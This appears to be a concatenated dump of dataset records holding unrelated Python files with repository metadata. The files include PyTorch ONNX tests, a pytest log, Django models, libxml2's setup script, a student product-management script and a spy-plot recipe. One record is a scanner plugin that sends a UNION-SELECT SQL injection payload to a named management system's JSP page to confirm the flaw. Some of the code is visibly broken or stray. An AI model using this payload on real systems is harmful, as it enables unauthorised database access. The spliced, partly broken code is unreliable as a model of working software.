x = torch.ones(1, 2, 3)
graph, _, __ = utils._model_to_graph(UnsqueezeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Unsqueeeze"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_concat(self):
class ConcatModule(torch.nn.Module):
def forward(self, x):
# Why did I insert a Cast here? There appears to be intentional
# behavior in ONNX constant folding where constant tensors which
# are not attached to any known to be foldable onnx
# operations don't get extracted into the initializer graph. So
# without these casts, we will actually fail to pull out one of
# the constants, thus failing constant folding. I think the
# test is wrong but I don't have time to write a more correct
# test (I think the right way to go about the test is to setup
# a predicate for what invariant graphs should hold after
# constant folding, and then verify this predicate holds.
# I think the asserts below are an attempt at this predicate,
# but it is not right!)
#
# More commentary at
# https://github.com/pytorch/pytorch/pull/18698/files#r340107552
a = torch.tensor([[1., 2., 3.]]).to(torch.float)
b = torch.tensor([[4., 5., 6.]]).to(torch.float)
c = torch.cat((a, b), 0)
d = b + c
return x + d
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(ConcatModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Concat"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_lstm(self):
class GruNet(torch.nn.Module):
def __init__(self):
super(GruNet, self).__init__()
self.mygru = torch.nn.GRU(7, 3, 1, bidirectional=False)
def forward(self, input, initial_state):
return self.mygru(input, initial_state)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
input = torch.randn(5, 3, 7)
h0 = torch.randn(1, 3, 3)
graph, _, __ = utils._model_to_graph(GruNet(), (input, h0),
do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Concat"
assert node.kind() != "onnx::Unsqueeze"
assert len(list(graph.nodes())) == 3
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_transpose_matmul(self):
class MatMulNet(torch.nn.Module):
def __init__(self):
super(MatMulNet, self).__init__()
self.B = torch.nn.Parameter(torch.ones(5, 3))
def forward(self, A):
return torch.matmul(A, torch.transpose(self.B, -1, -2))
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
A = torch.randn(2, 3)
graph, _, __ = utils._model_to_graph(MatMulNet(), (A),
do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Transpose"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_reshape(self):
class ReshapeModule(torch.nn.Module):
def __init__(self, ):
super(ReshapeModule, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
b = self.weight.reshape(1, -1, 1, 1)
return x * b
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.randn(4, 5)
graph, _, __ = utils._model_to_graph(ReshapeModule(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Reshape"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_div(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
div = self.weight.div(torch.tensor([1, 2, 3, 4, 5]))
return div * x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Div"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_mul(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
mul = self.weight.mul(torch.tensor([1, 2, 3, 4, 5]))
return mul / x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Mul"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_add(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
add = self.weight + torch.tensor([1, 2, 3, 4, 5])
return add - x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, params_dict, __ = utils._model_to_graph(
Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
self.assertTrue(node.kind() != "onnx::Add")
self.assertEqual(len(list(graph.nodes())), 1)
params = list(params_dict.values())
self.assertEqual(len(params), 1)
weight = params[0]
self.assertEqual(weight, torch.tensor([2, 3, 4, 5, 6]))
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_sub(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
sub = self.weight - torch.tensor([1, 2, 3, 4, 5])
return sub + x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, params_dict, __ = utils._model_to_graph(
Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Sub"
self.assertEqual(len(list(graph.nodes())), 1)
params = list(params_dict.values())
self.assertEqual(len(params), 1)
weight = params[0]
self.assertEqual(weight, torch.tensor([0, -1, -2, -3, -4]))
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_sqrt(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
sqrt = torch.sqrt(self.weight)
return sqrt / x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Sqrt"
assert len(list(graph.nodes())) == 1
def test_constant_fold_shape(self):
class ShapeModule(torch.nn.Module):
def __init__(self):
super(ShapeModule, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
shape = self.weight.shape[0]
return x + shape
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(ShapeModule(), (x, ), do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Shape"
assert len(list(graph.nodes())) == 1
def test_strip_doc_string(self):
class MyModule(torch.nn.Module):
def forward(self, input):
return torch.exp(input)
x = torch.randn(3, 4)
def is_model_stripped(f, strip_doc_string=None):
if strip_doc_string is None:
torch.onnx.export(MyModule(), x, f, opset_version=self.opset_version)
else:
torch.onnx.export(MyModule(), x, f, strip_doc_string=strip_doc_string,
opset_version=self.opset_version)
model = onnx.load(io.BytesIO(f.getvalue()))
model_strip = copy.copy(model)
onnx.helper.strip_doc_string(model_strip)
return model == model_strip
# test strip_doc_string=True (default)
self.assertTrue(is_model_stripped(io.BytesIO()))
# test strip_doc_string=False
self.assertFalse(is_model_stripped(io.BytesIO(), False))
# NB: remove this test once DataParallel can be correctly handled
def test_error_on_data_parallel(self):
model = torch.nn.DataParallel(torch.nn.ReflectionPad2d((1, 2, 3, 4)))
x = torch.randn(1, 2, 3, 4)
f = io.BytesIO()
with self.assertRaisesRegex(ValueError,
'torch.nn.DataParallel is not supported by ONNX '
'exporter, please use \'attribute\' module to '
'unwrap model from torch.nn.DataParallel. Try '):
torch.onnx.export(model, x, f, opset_version=self.opset_version)
def test_export_mode(self):
class MyModule(torch.nn.Module):
def forward(self, x):
y = x + 1
return y
model = MyModule()
x = torch.randn(10, 3, 128, 128)
f = io.BytesIO()
# set mode to in inference mode and export in training mode
model.eval()
old_state = model.training
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
# verify that the model state is preserved
assert model.training == old_state
# set mode to training mode and export in inference mode
model.train()
old_state = model.training
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.EVAL)
# verify that the model state is preserved
assert model.training == old_state
# TODO: Enable test when BatchNorm is implemented in ORT for opset 12.
@skipIfUnsupportedOpsetVersion([12])
def test_batchnorm_training(self):
class MyModule(torch.nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(3, affine=True)
def forward(self, x):
bn = self.bn(x)
return bn
model = MyModule()
x = torch.randn(10, 3, 128, 128)
model.train()
out = model(x)
# state after 1 train epoch
running_mean = model.bn.running_mean
running_var = model.bn.running_var
saved_mean = x.mean((0, 2, 3))
saved_var = x.var((0, 2, 3))
pytorch_out = [out.detach().numpy(),
running_mean.cpu().numpy(), running_var.cpu().numpy(),
saved_mean.cpu().numpy(), saved_var.cpu().numpy()]
model_export = MyModule()
f = io.BytesIO()
torch.onnx.export(model_export, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
ort_sess = onnxruntime.InferenceSession(f.getvalue())
ort_inputs = {ort_sess.get_inputs()[0].name : x.cpu().numpy()}
ort_outs = ort_sess.run(None, ort_inputs)
[np.testing.assert_allclose(p_out, ort_out, atol=10e-3, rtol=10e-3) for p_out, ort_out in zip(pytorch_out, ort_outs)]
# TODO: Enable test when Dropout is implemented in ORT for opset 12.
@skipIfUnsupportedOpsetVersion([12])
def test_dropout_training(self):
class MyModule(torch.nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.dropout = torch.nn.Dropout(0.4)
def forward(self, x):
dropout = self.dropout(x)
return dropout
model = MyModule()
x = torch.randn(10, 3, 128, 128)
model.train()
f = io.BytesIO()
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
ort_sess = onnxruntime.InferenceSession(f.getvalue())
ort_inputs = {ort_sess.get_inputs()[0].name : x.cpu().numpy()}
ort_outs = ort_sess.run(None, ort_inputs)
assert x != ort_outs[0]
# opset 10 tests
TestUtilityFuns_opset10 = type(str("TestUtilityFuns_opset10"),
(TestCase,),
dict(TestUtilityFuns.__dict__, opset_version=10))
# opset 11 tests
TestUtilityFuns_opset11 = type(str("TestUtilityFuns_opset11"),
(TestCase,),
dict(TestUtilityFuns.__dict__, opset_version=11))
# opset 12 tests
TestUtilityFuns_opset12 = type(str("TestUtilityFuns_opset12"),
(TestCase,),
dict(TestUtilityFuns.__dict__, opset_version=12))
# opset 12tests
TestUtilityFuns_opset12 = type(str("TestUtilityFuns_opset12"),
(TestCase,),
dict(TestUtilityFuns.__dict__, opset_version=12))
if __name__ == '__main__':
run_tests()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
123fa1bf54e8b6e07efb17bac26e992b93729f39 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /output/StudentProblem/10.21.11.45/3/1569578443.py | 1753098b316b763fb20e3410fc4080977f4d3725 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | ============================= test session starts ==============================
platform darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
rootdir: /tmp
collected 1 item
../../../../../tmp F [100%]
=================================== FAILURES ===================================
_____________________________________ test _____________________________________
def test():
"""tested leap funktion"""
assert leap(2004)
> assert leap(2001)
E assert False
E + where False = leap(2001)
/private/tmp/blabla.py:19: AssertionError
=========================== short test summary info ============================
FAILED ../../../../../tmp/::test - assert False
============================== 1 failed in 0.06s ===============================
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
9f47de70b04ccb57858ed871c067590152ce6840 | 9dd665b950ff86c82f3ea74b6c1216bc42c7c1df | /Programming-Basics/First_Steps_In_Coding/Square_Area.py | 7b867e465fb00630c6fb5ea314fe8df94b93902e | [] | no_license | toshhPOP/SoftUniCourses | 464c63a92e6594654a223cd764dc425f2990918b | b17021edd87d03b903567bf383ee71dce9a484cb | refs/heads/main | 2023-08-27T20:37:07.849185 | 2021-11-06T08:28:52 | 2021-11-06T08:28:52 | 394,772,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53 | py | side = int(input())
area = side * side
print(area )
| [
"toshopz26@gmail.com"
] | toshopz26@gmail.com |
e5220636500572d14722d578ed0d36e272a73c4c | d5125ccc1ef9915ffd72c575225a620aac5cb347 | /development/django_test_project/django_mysite/blog/models.py | dec8106056e3e47a4cc70ec40a2e11f392eae651 | [] | no_license | yurui829/stefanbo | 2231074e0e4f04438aff647563299ad1947bd760 | 449f862c81a3b4ae3e079ecb4a15b3a5cbcca701 | refs/heads/master | 2021-01-24T23:42:52.064783 | 2014-07-02T03:05:04 | 2014-07-02T03:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.db import models
# import easy_thumbnail
from easy_thumbnails.fields import ThumbnailerImageField
############################################################
class BlogPost(models.Model):
title = models.CharField(max_length=150)
body = models.TextField()
timestamp = models.DateTimeField()
#############################################################
class Item(models.Model):
name = models.CharField(max_length=250)
description = models.TextField()
class Meta:
ordering = ['name']
def __unicode__(self):
return self.name
@models.permalink
def get_absolute_url(self):
return ('item_detail', None, {'object_id': self.id})
class Photo(models.Model):
item = models.ForeignKey(Item)
title = models.CharField(max_length=100)
image = ThumbnailerImageField(upload_to='photos', blank=True)
caption = models.CharField(max_length=250, blank=True)
def __unicode__(self):
return self.title
#class Meta:
# ordering = ['title']
#def __unicode__(self):
# return self.title
#@models.permalink
#def get_absolute_url(self):
# return ('photo_detail', None, {'object_id': self.id})
| [
"stefan_bo@163.com"
] | stefan_bo@163.com |
cce604d7c87324c908134270009a9e2f9e3e3505 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/others/hnkj_researchinfo_dan_sqli.py | 45e7bf7e021770805dc12e1b41a3c2330a28bc57 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,064 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 汇能群管理系统SQL注入
referer: http://wooyun.org/bugs/wooyun-2010-0152664
author: Lucifer
description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
'''
import sys
import requests
class hnkj_researchinfo_dan_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
a34bf01cdd8b3293561d1ade7fa2babcf4b1d786 | 7034b7dec4a068493adde012e576891cb60c8d1e | /python/setup.py | f80a66c4f82ee2e5adb8436f2e19d3106f5beb50 | [
"MIT",
"LicenseRef-scancode-x11-xconsortium-veillard"
] | permissive | OpenCMISS-Dependencies/libxml2 | 4ed6741cfc7a9c89b03972422522203b28e6fc16 | 29930a028df0e92e6cec778f461194acc16d9c04 | refs/heads/v2.7.6 | 2022-05-02T03:33:26.421280 | 2022-04-26T21:26:34 | 2022-04-26T21:26:34 | 3,723,092 | 0 | 5 | NOASSERTION | 2021-04-19T21:25:51 | 2012-03-14T22:40:54 | C | UTF-8 | Python | false | false | 6,679 | py | #!/usr/bin/python -u
#
# Setup script for libxml2 and libxslt if found
#
import sys, os
from distutils.core import setup, Extension
# Below ROOT, we expect to find include, include/libxml2, lib and bin.
# On *nix, it is not needed (but should not harm),
# on Windows, it is set by configure.js.
ROOT = r'/usr'
# Thread-enabled libxml2
with_threads = 1
# If this flag is set (windows only),
# a private copy of the dlls are included in the package.
# If this flag is not set, the libxml2 and libxslt
# dlls must be found somewhere in the PATH at runtime.
WITHDLLS = 1 and sys.platform.startswith('win')
def missing(file):
if os.access(file, os.R_OK) == 0:
return 1
return 0
try:
HOME = os.environ['HOME']
except:
HOME="C:"
if WITHDLLS:
# libxml dlls (expected in ROOT/bin)
dlls = [ 'iconv.dll','libxml2.dll','libxslt.dll','libexslt.dll' ]
dlls = map(lambda dll: os.path.join(ROOT,'bin',dll),dlls)
# create __init__.py for the libxmlmods package
if not os.path.exists("libxmlmods"):
os.mkdir("libxmlmods")
open("libxmlmods/__init__.py","w").close()
def altImport(s):
s = s.replace("import libxml2mod","from libxmlmods import libxml2mod")
s = s.replace("import libxsltmod","from libxmlmods import libxsltmod")
return s
if sys.platform.startswith('win'):
libraryPrefix = 'lib'
platformLibs = []
else:
libraryPrefix = ''
platformLibs = ["m","z"]
# those are examined to find
# - libxml2/libxml/tree.h
# - iconv.h
# - libxslt/xsltconfig.h
includes_dir = [
"/usr/include",
"/usr/local/include",
"/opt/include",
os.path.join(ROOT,'include'),
HOME
];
xml_includes=""
for dir in includes_dir:
if not missing(dir + "/libxml2/libxml/tree.h"):
xml_includes=dir + "/libxml2"
break;
if xml_includes == "":
print "failed to find headers for libxml2: update includes_dir"
sys.exit(1)
iconv_includes=""
for dir in includes_dir:
if not missing(dir + "/iconv.h"):
iconv_includes=dir
break;
if iconv_includes == "":
print "failed to find headers for libiconv: update includes_dir"
sys.exit(1)
# those are added in the linker search path for libraries
libdirs = [
os.path.join(ROOT,'lib'),
]
xml_files = ["libxml2-api.xml", "libxml2-python-api.xml",
"libxml.c", "libxml.py", "libxml_wrap.h", "types.c",
"xmlgenerator.py", "README", "TODO", "drv_libxml2.py"]
xslt_files = ["libxslt-api.xml", "libxslt-python-api.xml",
"libxslt.c", "libxsl.py", "libxslt_wrap.h",
"xsltgenerator.py"]
if missing("libxml2-py.c") or missing("libxml2.py"):
try:
try:
import xmlgenerator
except:
import generator
except:
print "failed to find and generate stubs for libxml2, aborting ..."
print sys.exc_type, sys.exc_value
sys.exit(1)
head = open("libxml.py", "r")
generated = open("libxml2class.py", "r")
result = open("libxml2.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=0
if missing("libxslt-py.c") or missing("libxslt.py"):
if missing("xsltgenerator.py") or missing("libxslt-api.xml"):
print "libxslt stub generator not found, libxslt not built"
else:
try:
import xsltgenerator
except:
print "failed to generate stubs for libxslt, aborting ..."
print sys.exc_type, sys.exc_value
else:
head = open("libxsl.py", "r")
generated = open("libxsltclass.py", "r")
result = open("libxslt.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=1
else:
with_xslt=1
if with_xslt == 1:
xslt_includes=""
for dir in includes_dir:
if not missing(dir + "/libxslt/xsltconfig.h"):
xslt_includes=dir + "/libxslt"
break;
if xslt_includes == "":
print "failed to find headers for libxslt: update includes_dir"
with_xslt = 0
descr = "libxml2 package"
modules = [ 'libxml2', 'drv_libxml2' ]
if WITHDLLS:
modules.append('libxmlmods.__init__')
c_files = ['libxml2-py.c', 'libxml.c', 'types.c' ]
includes= [xml_includes, iconv_includes]
libs = [libraryPrefix + "xml2"] + platformLibs
macros = []
if with_threads:
macros.append(('_REENTRANT','1'))
if with_xslt == 1:
descr = "libxml2 and libxslt package"
if not sys.platform.startswith('win'):
#
# We are gonna build 2 identical shared libs with merge initializing
# both libxml2mod and libxsltmod
#
c_files = c_files + ['libxslt-py.c', 'libxslt.c']
xslt_c_files = c_files
macros.append(('MERGED_MODULES', '1'))
else:
#
# On windows the MERGED_MODULE option is not needed
# (and does not work)
#
xslt_c_files = ['libxslt-py.c', 'libxslt.c', 'types.c']
libs.insert(0, libraryPrefix + 'exslt')
libs.insert(0, libraryPrefix + 'xslt')
includes.append(xslt_includes)
modules.append('libxslt')
extens=[Extension('libxml2mod', c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros)]
if with_xslt == 1:
extens.append(Extension('libxsltmod', xslt_c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros))
if missing("MANIFEST"):
manifest = open("MANIFEST", "w")
manifest.write("setup.py\n")
for file in xml_files:
manifest.write(file + "\n")
if with_xslt == 1:
for file in xslt_files:
manifest.write(file + "\n")
manifest.close()
if WITHDLLS:
ext_package = "libxmlmods"
if sys.version >= "2.2":
base = "lib/site-packages/"
else:
base = ""
data_files = [(base+"libxmlmods",dlls)]
else:
ext_package = None
data_files = []
setup (name = "libxml2-python",
# On *nix, the version number is created from setup.py.in
# On windows, it is set by configure.js
version = "2.7.6",
description = descr,
author = "Daniel Veillard",
author_email = "veillard@redhat.com",
url = "http://xmlsoft.org/python.html",
licence="MIT Licence",
py_modules=modules,
ext_modules=extens,
ext_package=ext_package,
data_files=data_files,
)
sys.exit(0)
| [
"h.sorby@auckland.ac.nz"
] | h.sorby@auckland.ac.nz |
af3fb2b3688a0e354caa5b88c3565eebf0664c0f | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211026231719.py | 291ef58343af0bae5fbd6dccf33cceea045d6ea9 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 6,967 | py | import data as list_product
import random
def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
self.Id = Id
self.Product_code = Product_code
self.Product_name = Product_name
self.Brand = Brand
self.Year = Year
self.Size = Size
# Thêm sản phẩm
def AddProduct():
print("THÊM SẢN PHẨM")
product = {
"Id": "",
"Product_code": "",
"Product_name": "",
"Brand": "",
"Price": "",
"Year": "",
"Quantity": "",
"Size": ""
}
print("Nhập ID sản phẩm:")
Id = int(input())
while True:
student = FindProductDuplicate(Id)
if student != False:
print("ID đã tồn tại, vui lòng nhập lại ID:")
Id = int(input())
else:
break
product['Id'] = Id
# Mã sản phẩm random
code_product = random.randint(1, 99)
str_id = "HKSP"
if code_product <= 9:
str_id += "0" + str(code_product)
else:
str_id += str(code_product)
product["Product_code"] = str_id
print("Nhập tên sản phẩm: ")
product['Product_name'] = input()
print("Nhập thương hiệu sản phẩm: ")
product['Brand'] = input()
print("Nhập giá sản phẩm: ")
product['Price'] = float(input())
print("Nhập năm sản xuất: ")
product['Year'] = int(input())
print("Nhập số lượng: ")
product['Quantity'] = int(input())
print("Nhập size giày: ")
product['Size'] = input()
list_product.list_product.append(product)
answer = input("Bạn có muốn nhập tiếp không? Y/N ")
if answer == "y" or answer == "Y":
AddProduct()
# Tìm kiếm ID trùng lặp
def FindProductDuplicate(Id):
for i in range(0, len(list_product.list_product)):
if list_product.list_product[i]['Id'] == Id:
return [i, list_product.list_product[i]]
return False
# Hiển thị tất cả sản phẩm
def ShowAllProduct():
print("*** HIỂN THỊ TẤT CẢ SẢN PHẨM ***")
if len(list_product.list_product) == 0 or len(list_product.list_product) < 0:
print("Chưa có sản phẩm nào để hiển thị! ".upper())
for i in range(0, len(list_product.list_product)):
print("ID: ", list_product.list_product[i]['Id']),
print("Mã sản phẩm: ", list_product.list_product[i]['Product_code']),
print("Tên sản phẩm: ", list_product.list_product[i]['Product_name']),
print("Thương hiệu: ", list_product.list_product[i]['Brand']),
print("Giá: ", list_product.list_product[i]['Price']),
print("Năm xuất bản: ", list_product.list_product[i]['Year']),
print("Số lượng: ", list_product.list_product[i]['Quantity']),
print("Size giày: ", list_product.list_product[i]['Size'])
print("________________________________")
# Sửa thông tin sản phẩm
def UpdateProduct():
print("*** CẬP NHẬT THÔNG TIN SẢN PHẨM ***")
print("Nhập ID sản phẩm cần sửa")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Không tìm thấy sản phẩm ID = ", Id)
else:
print("""Bạn muốn cập nhật mục nào ? :
0. Thoát.
1. Tên sản phẩm.
2. Thương hiệu sản phẩm.
3. Giá sản phẩm
4. Size giày.
5. Số lượng.
6. Năm xuất bản. """)
action = 0
while action >= 0:
if action == 1:
UpdateProductName()
elif action == 2:
UpdateProductBrand()
elif action == 3:
UpdateProductPrice()
elif action == 4:
UpdateProductSize()
elif action == 5:
UpdateProductQuatity()
elif action == 6:
UpdateProductYear()
def UpdateProductName():
print("Nhập tên sản phẩm")
name_product = input()
product[1]['Product_name'] = name_product
def UpdateProductBrand():
print("Nhập thương hiệu của sản phẩm")
name_product = input()
product[1]['Brand'] = name_product
def UpdateProductPrice():
print("Nhập giá mới của sản phẩm")
name_product = float(input())
product[1]['Price'] = name_product
def UpdateProductSize():
print("Nhập size của sản phẩm")
name_product = input()
product[1]['Size'] = name_product
def UpdateProductYear():
print("Nhập năm sản xuất của sản phẩm")
name_product = int(input())
product[1]['Year'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateProductQuatity():
print("Nhập số lượng sản phẩm")
name_product = int(input())
product[1]['Quantity'] = name_product
list_product.list_product[product[0]] = product[1]
action = int(input("Bạn chọn mục cập nhật nào? "))
if action == 0:
print("Không cập nhật mục nào")
break
# Xóa sản phẩm
def DeleteProduct():
print("*** XÓA SẢN PHẨM ***")
print("Nhập ID sản phẩm cần xóa:")
Id = int(input())
product = FindProductDuplicate(Id)
if product != False:
list_product.list_product.remove(product[1])
print("Xóa sản phẩm thành công!")
else:
print("Không tìm thấy sản phẩm muốn xóa!")
# Tìm kiếm sản phẩm
def FindProductByName():
lí
print("*** TÌM KIẾM SẢN PHẨM ***")
print(list_product.list_product['Product_name'])
NameProduct = str(
input("Nhập tên sản phẩm hoặc tên thương hiệu bạn muốn tìm kiếm: ")).upper()
if list_product.list_product['Product_name'].upper() in NameProduct or list_product.list_product['Brand'].upper() in NameProduct:
for i in range(0, len(list_product.list_product)):
print("ID: ", list_product.list_product[i]['Id']),
print("Mã sản phẩm: ",
list_product.list_product[i]['Product_code']),
print("Tên sản phẩm: ",
list_product.list_product[i]['Product_name']),
print("Thương hiệu: ", list_product.list_product[i]['Brand']),
print("Giá: ", list_product.list_product[i]['Price']),
print("Năm xuất bản: ", list_product.list_product[i]['Year']),
print("Số lượng: ", list_product.list_product[i]['Quantity']),
print("Size giày: ", list_product.list_product[i]['Size'])
print("________________________________")
else:
print("Không tìm thấy sản phẩm này @@".upper())
| [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
b89b38a5777080f39b5b0af78beb817fc594e3fe | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/390208_Matlablike_spy_pcolor/recipe-390208.py | af0402c8845b6bd612d208af863b90832966c331 | [
"MIT",
"Python-2.0"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,546 | py | def spy_matrix_pil(A,fname='tmp.png',cutoff=0.1,do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'spy' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
